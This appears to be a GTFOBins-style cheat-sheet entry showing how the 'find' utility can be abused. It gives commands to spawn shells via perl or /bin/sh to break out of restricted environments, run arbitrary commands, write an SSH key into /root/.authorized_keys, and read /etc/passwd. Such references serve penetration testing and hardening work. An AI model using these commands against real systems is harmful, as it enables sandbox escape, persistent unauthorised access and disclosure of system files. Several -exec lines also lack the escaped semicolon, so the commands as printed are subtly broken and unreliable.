It can be used to break out from restricted environments by spawning an interactive system shell.
Can be used to execute arbitrary commands on a system and spawn shells either indirectly
find . -name i_do_not_exist -or -exec perl -e 'exec sh' ; -quit
or directly.
find . -exec /bin/sh ; -quit
It can be used to break out from the intended program by running non-interactive system commands.
Can be used to execute arbitrary commands on a system.
find . -name i_do_not_exist -or -exec ls ; -quit
It writes data to files, it may be used to do privileged writes or write files outside a restricted file system.
Find has various capabilities to write to files and it is recommended to read the manual for more details, especially its fprintf and ‘UNUSUAL FILENAMES’ sections.
find . -fprintf /root/.authorized_keys 'ssh-rsa ...' -quit
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
Reading of files is possible by executing cat.
find /etc/passwd -exec cat {} ;